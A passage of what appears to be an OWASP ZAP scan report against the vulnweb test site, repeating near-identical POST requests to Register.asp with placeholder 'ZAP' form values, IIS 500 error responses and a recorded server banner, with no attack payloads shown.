tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:09 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:09 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:10 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:10 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:10 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:10 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:12 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:12 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:12 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:01 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:12 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:02 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:02 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 465 bytes. |
